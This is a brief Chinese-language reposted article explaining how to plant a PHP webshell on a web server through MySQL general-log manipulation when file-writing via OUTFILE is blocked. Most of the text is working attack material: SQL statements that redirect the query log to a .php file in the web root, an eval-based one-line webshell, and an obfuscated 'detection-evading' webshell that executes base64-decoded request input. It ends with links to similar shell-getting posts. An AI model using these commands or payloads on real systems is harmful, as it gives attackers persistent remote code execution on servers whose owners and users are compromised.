SQL语句利用日志写shell

SQL语句利用日志写shell
2020-02-14 12:14:39 Author: mp.weixin.qq.com(查看原文) 阅读量:130 收藏

outfile被禁止，或者写入文件被拦截；

在数据库中操作如下：（必须是root权限）

show variables like '%general%'; #查看配置

set global general_log = on; #开启general log模式

set global general_log_file = '/var/www/html/1.php'; #设置日志目录为shell地址

select '<?php eval($_POST[cmd]);?>' #写入shell

SQL查询免杀shell的语句

SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_='a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"

文章出处：Evi1cg's blog

原文链接：

https://evi1cg.me/archives/test1.html

微信公众号文章素材之分割线大全

推荐文章++++

*win内网中利用ipc弹shell小记

*使用One-Lin3r快速生成反向shell,Privesc

*常见web中间件拿shell

文章来源: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650459773&idx=3&sn=ae08e3ff8345132a880eeb6eeded9656&chksm=83bbab99b4cc228f95f5560c3500d119eb20e9bcfb08277aa7edcfdcff734376411bc73f9a3a#rd
如有侵权请联系:admin#unsafe.sh